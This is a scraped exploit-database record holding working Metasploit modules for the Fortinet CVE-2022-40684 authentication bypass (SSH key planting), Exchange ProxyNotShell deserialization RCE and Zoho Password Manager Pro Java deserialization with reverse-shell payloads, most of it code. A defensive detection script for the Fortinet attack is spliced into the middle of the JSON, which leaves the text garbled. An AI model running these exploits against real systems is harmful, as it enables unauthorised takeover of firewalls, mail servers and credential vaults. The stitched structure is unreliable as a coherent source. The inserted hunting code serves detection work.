\nend \nend \n \ndef add_ssh_key \nif current_keys.include?(authorized_keys) \n# then we'll remove that on cleanup \nprint_good('Your key is already in the authorized_keys file') \nreturn \nend \nvprint_status('Adding SSH key to authorized_keys file') \n# Adding the SSH key as the last entry in the authorized_keys file \nkeystoadd = current_keys.first(2) + [authorized_keys] \ndata = keystoadd.map.with_index { |key, idx| [\"ssh-public-key#{idx + 1}\", \"\\\"#{key}\\\"\"] }.to_h \n \nres = fortinet_request({ \n'method' => 'PUT', \n'uri' => normalize_uri(target_uri.path, '/system/admin/', username), \n'data' => data.to_json \n}) \nfail_with(Failure::UnexpectedReply, 'Failed to add SSH key to authorized_keys file.') unless res&.code == 500 \nbody = res.get_json_document \nfail_with(Failure::UnexpectedReply, 'Unexpected reponse from the server after adding the key.') unless body.key?('cli_error') && body['cli_error'] =~ 
/SSH key is good/ \nend \n \ndef read_keys \nvprint_status('Reading SSH key from authorized_keys file') \nres = fortinet_request({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/system/admin/', username) \n}) \nfail_with(Failure::UnexpectedReply, 'Failed read current SSH keys') unless res&.code == 200 \nresult = res.get_json_document['results'].first \n['ssh-public-key1', 'ssh-public-key2', 'ssh-public-key3'].map do |key| \nresult[key].gsub('\"', '') unless result[key].empty? \nend.compact \nend \n \ndef do_login(ssh_options) \n# ensure we don't have a stale socket hanging around \nssh_options[:proxy].proxies = nil if ssh_options[:proxy] \nbegin \n::Timeout.timeout(datastore['SSH_TIMEOUT']) do \nself.ssh_socket = Net::SSH.start(rhost, username, ssh_options) \nend \nrescue Rex::ConnectionError \nfail_with(Failure::Unreachable, 'Disconnected during negotiation') \nrescue Net::SSH::Disconnect, ::EOFError \nfail_with(Failure::Disconnected, 'Timed out during negotiation') \nrescue Net::SSH::AuthenticationFailed \nfail_with(Failure::NoAccess, 'Failed authentication') \nrescue Net::SSH::Exception => e \nfail_with(Failure::Unknown, \"SSH Error: #{e.class} : #{e.message}\") \nend \n \nfail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket \nend \n \ndef exploit \nprint_status(\"Executing exploit on #{datastore['RHOST']}:#{datastore['RPORT']} target user: #{username}\") \nadd_ssh_key \nvprint_status('Establishing SSH connection') \nssh_options = ssh_client_defaults.merge({ \nauth_methods: ['publickey'], \nkey_data: [ ssh_private_key ], \nport: ssh_rport \n}) \nssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG'] \n \ndo_login(ssh_options) \n \nhandler(ssh_socket) \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/169431/fortinet_authentication_bypass_cve_2022_40684.rb.txt"}], "metasploit": [{"lastseen": "2022-11-30T20:50:17", "description": "This module 
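The module above leaves two things an operator can look for: a request fingerprint (`fortinet_request` sends `User-Agent: Report Runner` together with a `Forwarded` header naming `127.0.0.1`) and on-box state (an extra `ssh-public-keyN` on the `super_admin` account that `detect_username` selects, one whose `trusthost1` is `0.0.0.0 0.0.0.0`). The Ruby below is an added example, mine rather than the module's or Fortinet's, that turns both into checks; the admin listing and headers are constructed, the field names follow what the module reads, and the key allowlist is an assumption about the environment.

```ruby
require 'json'

# Added example: hunt for what this module leaves behind. My code, not the
# module's or Fortinet's.

# 1) Request fingerprint: every call from fortinet_request() carries this
#    User-Agent and a Forwarded header claiming a loopback origin.
FORWARDED_LOOPBACK = /for="?\[?127\.0\.0\.1\]?/i

def bypass_fingerprint?(headers)
  headers['User-Agent'].to_s == 'Report Runner' &&
    FORWARDED_LOOPBACK.match?(headers['Forwarded'].to_s)
end

# 2) On-box state: detect_username() picks super_admin accounts whose first
#    trusted host is unrestricted, and add_ssh_key() fills ssh-public-key1..3.
KEY_FIELDS = %w[ssh-public-key1 ssh-public-key2 ssh-public-key3].freeze

def exposed_super_admins(listing)
  listing['results']
    .select { |a| a['accprofile'] == 'super_admin' && a['trusthost1'] == '0.0.0.0 0.0.0.0' }
    .map { |a| a['name'] }
end

# The API returns each key wrapped in quotes; strip them as the module's read_keys does.
def account_keys(account)
  KEY_FIELDS.map { |f| account[f].to_s.delete('"') }.reject(&:empty?)
end

# [[account, key], ...] for keys absent from an operator-maintained allowlist.
def unexpected_ssh_keys(listing, allowlist)
  listing['results'].flat_map do |a|
    account_keys(a).reject { |k| allowlist.include?(k) }.map { |k| [a['name'], k] }
  end
end

# Constructed sample of GET /api/v2/cmdb/system/admin output; the field names
# are the ones the module reads, every value is invented.
def sample_listing
  JSON.parse(<<~'LISTING')
    {"results": [
      {"name": "admin", "accprofile": "super_admin", "trusthost1": "0.0.0.0 0.0.0.0",
       "ssh-public-key1": "\"ecdsa-sha2-nistp256 AAAAEXAMPLEKEYDATA admin@localhost\"",
       "ssh-public-key2": "", "ssh-public-key3": ""},
      {"name": "ops", "accprofile": "super_admin", "trusthost1": "10.1.0.0 255.255.255.0",
       "ssh-public-key1": "\"ssh-ed25519 AAAAC3NzEXAMPLE ops@bastion\"",
       "ssh-public-key2": "", "ssh-public-key3": ""},
      {"name": "auditor", "accprofile": "prof_admin", "trusthost1": "0.0.0.0 0.0.0.0",
       "ssh-public-key1": "", "ssh-public-key2": "", "ssh-public-key3": ""}
    ]}
  LISTING
end

# Assumed operator allowlist of keys that are supposed to be on the device.
KNOWN_KEYS = ['ssh-ed25519 AAAAC3NzEXAMPLE ops@bastion'].freeze

# Constructed request headers: one as the module sends them, one ordinary.
def sample_headers
  {
    bypass: { 'User-Agent' => 'Report Runner',
              'Forwarded' => 'for="[127.0.0.1]:41523";by="[127.0.0.1]:8080"' },
    normal: { 'User-Agent' => 'Mozilla/5.0', 'Forwarded' => 'for=203.0.113.9' }
  }
end

if $PROGRAM_NAME == __FILE__
  puts "Accounts the module would target: #{exposed_super_admins(sample_listing).join(', ')}"
  unexpected_ssh_keys(sample_listing, KNOWN_KEYS).each { |name, key| puts "Unexpected key on #{name}: #{key}" }
  sample_headers.each { |label, h| puts "#{label}: bypass_fingerprint=#{bypass_fingerprint?(h)}" }
end
```

The module's `cleanup` only blanks the last key slot rather than deleting it (its own comment notes the API did not honour DELETE), so an emptied `ssh-public-keyN` on a `super_admin` account with an unrestricted `trusthost1` is still worth a look, and restricting trusted hosts on those accounts removes them from the module's target selection entirely. Fortinet's advisory linked in the module (FG-IR-22-377) also points at device log entries with `user="Local_Process_Access"` as the indicator for this bypass.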
chains two vulnerabilities on Microsoft Exchange Server that, when combined, allow an authenticated attacker to interact with the Exchange Powershell backend (CVE-2022-41040), where a deserialization flaw can be leveraged to obtain code execution (CVE-2022-41082). This exploit only support Exchange Server 2019. These vulnerabilities were patched in November 2022.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-18T22:00:27", "type": "metasploit", "title": "Microsoft Exchange ProxyNotShell RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-28T15:06:14", "id": "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYNOTSHELL_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxynotshell_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Remote::HTTP::Exchange\n include Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyNotShell RCE',\n 'Description' => %q{\n This module chains two vulnerabilities on Microsoft Exchange Server\n that, when combined, allow an authenticated attacker to interact with\n the Exchange Powershell backend (CVE-2022-41040), where a\n deserialization flaw can be 
leveraged to obtain code execution\n (CVE-2022-41082). This exploit only support Exchange Server 2019.\n\n These vulnerabilities were patched in November 2022.\n },\n 'Author' => [\n 'Orange Tsai', # Discovery of ProxyShell SSRF\n 'Spencer McIntyre', # Metasploit module\n 'DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q', # Vulnerability analysis\n 'Piotr Bazyd\u0142o', # Vulnerability analysis\n 'Rich Warren', # EEMS bypass via ProxyNotRelay\n 'Soroush Dalili' # EEMS bypass\n ],\n 'References' => [\n [ 'CVE', '2022-41040' ], # ssrf\n [ 'CVE', '2022-41082' ], # rce\n [ 'URL', 'https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend' ],\n [ 'URL', 'https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/' ],\n [ 'URL', 'https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9' ],\n [ 'URL', 'https://rw.md/2022/11/09/ProxyNotRelay.html' ]\n ],\n 'DisclosureDate' => '2022-09-28', # announcement of limited details, patched 2022-11-08\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Platform' => ['windows'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Dropper',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_dropper\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD],\n 'Type' => :windows_command\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'AKA' => ['ProxyNotShell'],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n )\n )\n\n register_options([\n OptString.new('USERNAME', [ true, 'A specific username to authenticate as' ]),\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),\n OptString.new('DOMAIN', [ 
false, 'The domain to authenticate to' ])\n ])\n\n register_advanced_options([\n OptEnum.new('EemsBypass', [ true, 'Technique to bypass the EEMS rule', 'IBM037v1', %w[IBM037v1 none]])\n ])\n end\n\n def check\n @ssrf_email ||= Faker::Internet.email\n res = send_http('GET', '/mapi/nspi/')\n return CheckCode::Unknown if res.nil?\n return CheckCode::Unknown('Server responded with 401 Unauthorized.') if res.code == 401\n return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'\n\n # actually run the powershell cmdlet and see if it works, this will fail if:\n # * the credentials are incorrect (USERNAME, PASSWORD, DOMAIN)\n # * the exchange emergency mitigation service M1 rule is in place\n return CheckCode::Safe unless execute_powershell('Get-Mailbox')\n\n CheckCode::Vulnerable\n rescue Msf::Exploit::Failed => e\n CheckCode::Safe(e.to_s)\n end\n\n def ibm037(string)\n string.encode('IBM037').force_encoding('ASCII-8BIT')\n end\n\n def send_http(method, uri, opts = {})\n opts[:authentication] = {\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD'],\n 'preferred_auth' => 'NTLM'\n }\n\n if uri =~ /powershell/i && datastore['EemsBypass'] == 'IBM037v1'\n uri = \"/Autodiscover/autodiscover.json?#{ibm037(@ssrf_email + uri + '?')}&#{ibm037('Email')}=#{ibm037('Autodiscover/autodiscover.json?' 
+ @ssrf_email)}\"\n opts[:headers] = {\n 'X-Up-Devcap-Post-Charset' => 'IBM037',\n # technique needs the \"UP\" prefix, see: https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362\n 'User-Agent' => \"UP #{datastore['UserAgent']}\"\n }\n else\n uri = \"/Autodiscover/autodiscover.json?#{@ssrf_email + uri}?&Email=Autodiscover/autodiscover.json?#{@ssrf_email}\"\n end\n\n super(method, uri, opts)\n end\n\n def exploit\n # if we're doing pre-exploit checks, make sure the target is Exchange Server 2019 because the XamlGadget does not\n # work on Exchange Server 2016\n if datastore['AutoCheck'] && !datastore['ForceExploit'] && (version = exchange_get_version)\n vprint_status(\"Detected Exchange version: #{version}\")\n if version < Rex::Version.new('15.2')\n fail_with(Failure::NoTarget, 'This exploit is only compatible with Exchange Server 2019 (version 15.2)')\n end\n end\n\n @ssrf_email ||= Faker::Internet.email\n\n case target['Type']\n when :windows_command\n vprint_status(\"Generated payload: #{payload.encoded}\")\n execute_command(payload.encoded)\n when :windows_dropper\n execute_cmdstager({ linemax: 7_500 })\n end\n end\n\n def execute_command(cmd, _opts = {})\n xaml = Nokogiri::XML(<<-XAML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root\n <ResourceDictionary\n xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/presentation\"\n xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\"\n xmlns:System=\"clr-namespace:System;assembly=mscorlib\"\n xmlns:Diag=\"clr-namespace:System.Diagnostics;assembly=system\">\n <ObjectDataProvider x:Key=\"LaunchCalch\" ObjectType=\"{x:Type Diag:Process}\" MethodName=\"Start\">\n <ObjectDataProvider.MethodParameters>\n <System:String>cmd.exe</System:String>\n <System:String>/c #{cmd.encode(xml: :text)}</System:String>\n </ObjectDataProvider.MethodParameters>\n </ObjectDataProvider>\n </ResourceDictionary>\n XAML\n\n identity = 
Nokogiri::XML(<<-IDENTITY, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root\n <Obj N=\"V\" RefId=\"14\">\n <TN RefId=\"1\">\n <T>System.ServiceProcess.ServiceController</T>\n <T>System.Object</T>\n </TN>\n <ToString>Object</ToString>\n <Props>\n <S N=\"Name\">Type</S>\n <Obj N=\"TargetTypeForDeserialization\">\n <TN RefId=\"1\">\n <T>System.Exception</T>\n <T>System.Object</T>\n </TN>\n <MS>\n <BA N=\"SerializationData\">\n #{Rex::Text.encode_base64(XamlLoaderGadget.generate.to_binary_s)}\n </BA>\n </MS>\n </Obj>\n </Props>\n <S>\n <![CDATA[#{xaml}]]>\n </S>\n </Obj>\n IDENTITY\n\n execute_powershell('Get-Mailbox', args: [\n { name: '-Identity', value: identity }\n ])\n end\nend\n\nclass XamlLoaderGadget < Msf::Util::DotNetDeserialization::Types::SerializedStream\n include Msf::Util::DotNetDeserialization\n\n def self.generate\n from_values([\n Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),\n Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values(\n class_info: Types::General::ClassInfo.new(\n obj_id: 1,\n name: 'System.UnitySerializationHolder',\n member_names: %w[Data UnityType AssemblyName]\n ),\n member_type_info: Types::General::MemberTypeInfo.new(\n binary_type_enums: %i[String Primitive String],\n additional_infos: [ 8 ]\n ),\n member_values: [\n Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(\n obj_id: 2,\n string: 'System.Windows.Markup.XamlReader'\n )),\n 4,\n Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(\n obj_id: 3,\n string: 'PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35'\n ))\n ]\n ),\n Types::RecordValues::MessageEnd.new\n ])\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/exchange_proxynotshell_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-29T19:46:10", "description": "This module exploits a Java deserialization 
vulnerability in Zoho ManageEngine Pro before 12101 and PAM360 before 5510. Unauthenticated attackers can send a crafted XML-RPC request containing malicious serialized data to /xmlrpc to gain RCE as the SYSTEM user.\n", "cvss3": {}, "published": "2022-08-02T16:57:56", "type": "metasploit", "title": "Zoho Password Manager Pro XML-RPC Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2022-08-02T19:27:27", "id": "MSF:EXPLOIT-WINDOWS-HTTP-ZOHO_PASSWORD_MANAGER_PRO_XML_RPC_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::JavaDeserialization\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zoho Password Manager Pro XML-RPC Java Deserialization',\n 'Description' => %q{\n This module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro\n before 12101 and PAM360 before 5510. 
Unauthenticated attackers can send a\n crafted XML-RPC request containing malicious serialized data to /xmlrpc to\n gain RCE as the SYSTEM user.\n },\n 'Author' => [\n 'Vinicius', # Discovery\n 'Y4er', # Writeup\n 'Grant Willcox' # Exploit\n ],\n 'References' => [\n ['CVE', '2022-35405'],\n ['URL', 'https://xz.aliyun.com/t/11578'], # Writeup\n ['URL', 'https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html'], # Advisory\n ['URL', 'https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm'] # The patch.\n ],\n 'DisclosureDate' => '2022-06-24', # Vendor release date of patch and new installer, as advisory lacks any date.\n 'License' => MSF_LICENSE,\n 'Platform' => ['win'],\n 'Arch' => [ARCH_CMD, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows EXE Dropper',\n {\n 'Arch' => ARCH_X64,\n 'Type' => :windows_dropper,\n 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'Type' => :windows_command,\n 'Space' => 3000,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' }\n }\n ],\n [\n 'Windows Powershell',\n {\n 'Arch' => ARCH_X64,\n 'Type' => :windows_powershell,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp' }\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(7272),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n # Send an empty serialized object\n res = send_request_xmlrpc('')\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n if res.body.include?('Failed to read result object: null')\n return CheckCode::Vulnerable('Target can deserialize 
arbitrary data.')\n end\n\n CheckCode::Safe('Target cannot deserialize arbitrary data.')\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n case target['Type']\n when :windows_command\n execute_command(payload.encoded)\n when :windows_dropper\n cmd_target = targets.select { |target| target['Type'] == :windows_command }.first\n execute_cmdstager({ linemax: cmd_target.opts['Space'] })\n when :windows_powershell\n execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n res = send_request_xmlrpc(\n generate_java_deserialization_for_command('CommonsBeanutils1', 'cmd', cmd)\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\")\n end\n\n print_good(\"Successfully executed command: #{cmd}\")\n end\n\n def send_request_xmlrpc(data)\n # http://xmlrpc.com/\n # https://ws.apache.org/xmlrpc/\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/xmlrpc'),\n 'ctype' => 'text/xml',\n 'data' => <<~XML\n <?xml version=\"1.0\"?>\n <methodCall>\n <methodName>#{rand_text_alphanumeric(8..42)}</methodName>\n <params>\n <param>\n <value>\n <struct>\n <member>\n <name>#{rand_text_alphanumeric(8..42)}</name>\n <value>\n <serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\">#{Rex::Text.encode_base64(data)}</serializable>\n </value>\n </member>\n </struct>\n </value>\n </param>\n </params>\n </methodCall>\n XML\n )\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-19T22:46:49", "description": "This module exploits an authentication bypass vulnerability in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API to gain 
access to a chosen account. And then add a SSH key to the authorized_keys file of the chosen account, allowing to login to the system with the chosen account. Successful exploitation results in remote code execution.\n", "cvss3": {}, "published": "2022-10-14T20:19:43", "type": "metasploit", "title": "Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-17T22:51:28", "id": "MSF:EXPLOIT-LINUX-HTTP-FORTINET_AUTHENTICATION_BYPASS_CVE_2022_40684-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::SSH\n prepend Msf::Exploit::Remote::AutoCheck\n\n attr_accessor :ssh_socket\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.',\n 'Description' => %q{\n This module exploits an authentication bypass vulnerability\n in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API\n to gain access to a chosen account. 
And then add a SSH key to the\n authorized_keys file of the chosen account, allowing\n to login to the system with the chosen account.\n\n Successful exploitation results in remote code execution.\n },\n 'Author' => [\n 'Heyder Andrade <@HeyderAndrade>', # Metasploit module\n 'Zach Hanley <@hacks_zach>', # PoC\n ],\n 'References' => [\n ['CVE', '2022-40684'],\n ['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-377'],\n ['URL', 'https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684'],\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2022-10-10', # Vendor advisory\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'FortiOS',\n {\n 'DefaultOptions' => {\n 'PAYLOAD' => 'generic/ssh/interact'\n },\n 'Payload' => {\n 'Compat' => {\n 'PayloadType' => 'ssh_interact'\n }\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS,\n ARTIFACTS_ON_DISK # SSH key is added to authorized_keys file\n ]\n }\n )\n )\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to the Fortinet CMDB API', '/api/v2/cmdb/']),\n OptString.new('USERNAME', [false, 'Target username (Default: auto-detect)', nil]),\n OptString.new('PRIVATE_KEY', [false, 'SSH private key file path', nil]),\n OptString.new('KEY_PASS', [false, 'SSH private key password', nil]),\n OptString.new('SSH_RPORT', [true, 'SSH port to connect to', 22]),\n OptBool.new('PREFER_ADMIN', [false, 'Prefer to use the admin user if one is detected', true])\n ]\n )\n end\n\n def username\n if datastore['USERNAME']\n @username ||= datastore['USERNAME']\n else\n @username ||= detect_username\n end\n end\n\n def ssh_rport\n datastore['SSH_RPORT']\n end\n\n def current_keys\n @current_keys ||= read_keys\n end\n\n def 
ssh_keygen\n # ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8`\n if datastore['PRIVATE_KEY']\n @ssh_keygen ||= Net::SSH::KeyFactory.load_data_private_key(\n File.read(datastore['PRIVATE_KEY']),\n datastore['KEY_PASS'],\n datastore['PRIVATE_KEY']\n )\n else\n @ssh_keygen ||= OpenSSL::PKey::EC.generate('prime256v1')\n end\n end\n\n def ssh_private_key\n ssh_keygen.to_pem\n end\n\n def ssh_pubkey\n Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)\n end\n\n def authorized_keys\n pubkey = Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)\n \"#{ssh_keygen.ssh_type} #{pubkey} #{username}@localhost\"\n end\n\n def fortinet_request(params = {})\n send_request_cgi(\n {\n 'ctype' => 'application/json',\n 'agent' => 'Report Runner',\n 'headers' => {\n 'Forwarded' => \"for=\\\"[127.0.0.1]:#{rand(1024..65535)}\\\";by=\\\"[127.0.0.1]:#{rand(1024..65535)}\\\"\"\n }\n }.merge(params)\n )\n end\n\n def check\n vprint_status(\"Checking #{datastore['RHOST']}:#{datastore['RPORT']}\")\n # a normal request to the API should return a 401\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)),\n 'ctype' => 'application/json'\n })\n\n return CheckCode::Unknown('Target did not respond to check.') unless res\n return CheckCode::Safe('Target seems not affected by this vulnerability.') unless res.code == 401\n\n # Trying to bypasss the authentication and get the sshkey from the current targeted user it should return a 200 if vulnerable\n res = fortinet_request({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/system/status')\n })\n\n return CheckCode::Safe unless res&.code == 200\n\n version = res.get_json_document['version']\n\n print_good(\"Target is running the version #{version}, which is vulnerable.\")\n\n Socket.tcp(rhost, ssh_rport, connect_timeout: datastore['SSH_TIMEOUT']) { |sock| return CheckCode::Safe('However SSH is not open, so adding a ssh key wouldn\\t give you access to the 
host.') unless sock }\n\n CheckCode::Vulnerable('And SSH is running which makes it exploitable.')\n end\n\n def cleanup\n return unless ssh_socket\n\n # it assumes our key is the last one and set it to a random text. The API didn't respond to DELETE method\n data = {\n \"ssh-public-key#{current_keys.empty? ? '1' : current_keys.size}\" => '\"\"'\n }\n\n fortinet_request({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, '/system/admin/', username),\n 'data' => data.to_json\n })\n end\n\n def detect_username\n vprint_status('User auto-detection...')\n res = fortinet_request(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/system/admin')\n )\n users = res.get_json_document['results'].collect { |e| e['name'] if (e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0') }.compact\n # we prefer to use admin, but if it doesn't exist we chose a random one.\n if datastore['PREFER_ADMIN']\n vprint_status(\"PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, but if it isn't found we will pick a random one.\")\n users.include?('admin') ? 
'admin' : users.sample\n else\n vprint_status(\"PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, we will get a random that is not the admin.\")\n (users - ['admin']).sample\n end\n end\n\n def add_ssh_key\n if current_keys.include?(authorized_keys)\n # then we'll remove that on cleanup\n print_good('Your key is already in the authorized_keys file')\n return\n end\n vprint_status('Adding SSH key to authorized_keys file')\n # Adding the SSH key as the last entry in the authorized_keys file\n keystoadd = current_keys.first(2) + [authorized_keys]\n data = keystoadd.map.with_index { |key, idx| [\"ssh-public-key#{idx + 1}\", \"\\\"#{key}\\\"\"] }.to_h\n\n res = fortinet_request({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, '/system/admin/', username),\n 'data' => data.to_json\n })\n fail_with(Failure::UnexpectedReply, 'Failed to add SSH key to authorized_keys file.') unless res&.code == 500\n body = res.get_json_document\n fail_with(Failure::UnexpectedReply, 'Unexpected reponse from the server after adding the key.') unless body.key?('cli_error') && body['cli_error'] =~ /SSH key is good/\n end\n\n def read_keys\n vprint_status('Reading SSH key from authorized_keys file')\n res = fortinet_request({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/system/admin/', username)\n })\n fail_with(Failure::UnexpectedReply, 'Failed read current SSH keys') unless res&.code == 200\n result = res.get_json_document['results'].first\n ['ssh-public-key1', 'ssh-public-key2', 'ssh-public-key3'].map do |key|\n result[key].gsub('\"', '') unless result[key].empty?\n end.compact\n end\n\n def do_login(ssh_options)\n # ensure we don't have a stale socket hanging around\n ssh_options[:proxy].proxies = nil if ssh_options[:proxy]\n begin\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\n self.ssh_socket = Net::SSH.start(rhost, username, ssh_options)\n end\n rescue Rex::ConnectionError\n fail_with(Failure::Unreachable, 'Disconnected during negotiation')\n rescue 
